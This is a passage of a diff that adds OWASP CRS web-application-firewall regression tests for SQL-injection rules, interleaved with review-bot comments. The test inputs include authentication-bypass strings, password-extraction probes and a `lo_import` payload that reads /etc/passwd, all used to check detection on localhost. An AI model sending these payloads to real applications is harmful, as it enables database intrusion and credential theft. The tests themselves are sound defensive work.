'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'
.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-20 + desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-21 + desc: "Detects odd number of quotes in request headers" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and starts_with(password) and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-22 + desc: "Detects odd number of quotes in request headers" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: 
+ log_contains: id "942521"
+ - test_title: 942521-23
+ desc: "Detects odd number of quotes in request headers"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "1' and lo_get(16400)::text::bool and 'true"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
+ - test_title: 942521-24
+ desc: "Detects odd number of quotes in request headers"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
new file mode 100644
index 0000000000..92b5699162
--- /dev/null
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
@@ -0,0 +1,154 @@
+---
+meta:
+ author: "terjanq, Franziska Bühler"
+ description: "Detects basic SQL authentication bypass attempts 4.1/4"
+ enabled: true
+ name: 942522.yaml
+tests:
+ - test_title: 942522-1
+ desc: "Blocks bypass with escaped quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ # \'or'1
+ data: "var=%5C'or'1"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942522"
+ - test_title: 942522-2
+ desc: "Blocks bypass with escaped quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ # \"or"1
+ data: "var=%5C%22or%221"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942522"
+ - test_title: 942522-3
+ desc: "Blocks bypass with escaped quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ # \`or`1
+ data: "var=%5C%60or%601"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942522"
+ - test_title: 942522-4
+ desc: "Blocks bypass with: \\'and"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ data: "var=%5C'and"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942522"
+ - test_title: 942522-5
+ desc: "Negative test: doesn't block normal SQLi"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+
User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ data: "var='or'1"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942522"
+ - test_title: 942522-6
+ desc: "Negative test: doesn't block escaped quotes without following (and|or)"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ data: "var=%5C' foo or"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942522"
+ - test_title: 942522-7
+ desc: "New line bypass"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ data: "var=newline%0A%5C' and 1"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942522"
+ - test_title: 942522-8
+ desc: "Negative test: Wikipedia article about SQLi"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ data:
"var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20datab
ases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_title: 942522-9 + desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + 
version: HTTP/1.0
+ output:
+ log_contains: id "942522"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
new file mode 100644
index 0000000000..63a3993ca7
--- /dev/null
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
@@ -0,0 +1,23 @@
+---
+meta:
+ author: "Franziska Bühler"
+ description: "Detects SQL query termination"
+ enabled: true
+ name: 942530.yaml
+tests:
+ - test_title: 942530-1
+ desc: "Detects SQL query termination with ';"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ data: "email=admin@juice-sh.op';&password=foo"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942530"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
new file mode 100644
index 0000000000..f4b72dab2d
--- /dev/null
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
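Review bot: The `desc` of test 942522-9 (`"Detect admin%40juice-sh.op'and%20likely%20(id)--"`) omits the backslash that the data line actually carries: `%5C%27` decodes to `\'`, and that escaped quote is what makes this payload a case for rule 942522 rather than a plain `'and` case, which 942521-20 already covers with the identical data. Suggest `desc: "Detect admin%40juice-sh.op\\'and%20likely%20(id)--"` so a reader can tell why this test belongs to 942522 without decoding the double-encoded body by hand. Tests 942522-1 to -3 document the decoded payload in a `# …` comment above `data:`, but -4, -7 and -9 do not; adding the same comment to those stages would keep the file consistent.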
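Review bot: The 942530.yaml hunk adds a single positive case (`email=admin@juice-sh.op';&password=foo`) and no `no_log_contains` case, so nothing in the file pins down which benign inputs rule 942530 must let through. A negative stage with an apostrophe that is not followed by `;`, or with a quoted-and-closed field, would document the intended false-positive boundary the way 942540-4 and 942540-5 do for rule 942540 in the next hunk. The `desc` of 942530-1 also writes `';` inside a double-quoted scalar that otherwise mirrors the meta description; stating the decoded payload there (e.g. `desc: "Detects SQL query termination with ';' followed by ';' (email=admin@juice-sh.op';)"`) would make the single test self-explanatory.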
@@ -0,0 +1,135 @@
+---
+meta:
+ author: "karelorigin, Walter Hop"
+ description: Various Authentication bypass tests
+ enabled: true
+ name: 942540.yaml
+tests:
+ - test_title: 942540-1
+ desc: "Positive test for single quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=admin%40juice-sh.op';"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942540"
+ - test_title: 942540-2
+ desc: "Positive test for double quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=admin%40juice-sh.op\";"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942540"
+ - test_title: 942540-3
+ desc: "Positive test for backticks"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=admin%40juice-sh.op`;"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942540"
+ - test_title: 942540-4
+ desc: "False positive test CSV balanced single quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email='foo';'bar';'def'"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942540"
+ - test_title: 942540-5
+ desc: "False positive test balanced backticks"
+ stages:
+ - stage:
+ input:
+
dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=`foo`;`bar`;`def`"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942540"
+ - test_title: 942540-6
+ desc: "False positive test (markdown) mixed and balanced quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Content-Type: "multipart/form-data; boundary=--------397236876"
+ method: POST
+ port: 80
+ uri: "/"
+ data: |
+ ----------397236876
+ Content-Disposition: form-data; name="document"; filename="document.md"
+ Content-Type: text/markdown
+
+ # Foo
+ my name is 'foo'; and I work on CRS.
+ # Bar
+ my name is "bar"; and I work on CRS.
+ ----------397236876--
+ output:
+ no_log_contains: id "942540"
+ - test_title: 942540-7
+ desc: "Test for bypass with comment"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942540"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
new file mode 100644
index 0000000000..f7f9546701
--- /dev/null
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
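Review bot: Stage 942540-6 (the multipart markdown false-positive case) is the only stage in 942540.yaml without `version: HTTP/1.0`; every other stage sets it, so the omission reads as an oversight rather than a choice, and adding `version: HTTP/1.0` after the `data: |` block keeps the request shape uniform across the file. The same stage is also the only one that sets an explicit `Content-Type`; the six `application/x-www-form-urlencoded`-style bodies (`email=…`) rely on whatever default the test harness applies, which I cannot confirm from this diff, so a one-line comment above the first `data:` stating that assumption would help the next person who sees these tests fail on a harness change. The multipart body comes from a YAML literal block and therefore has LF line endings; if the harness does not normalise them to CRLF, the body may not be parsed as the intended `document.md` part, which is worth confirming since the test's value depends on the quotes being seen inside a file upload.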
@@ -0,0 +1,673 @@ +--- +meta: + author: "Andrea Menin (theMiddle)" + description: JSON in SQL bypass technique + enabled: true + name: 942550.yaml +tests: + - test_title: 942550-1 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-2 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-3 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-4 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' + stages: + - stage: + input: + dest_addr: 127.0.0.1 
+ headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-5 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-6 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-7 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - 
test_title: 942550-8 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-9 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-10 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-11 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + 
uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-12 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-13 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-14 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-15 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb + stages: + - 
stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-16
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
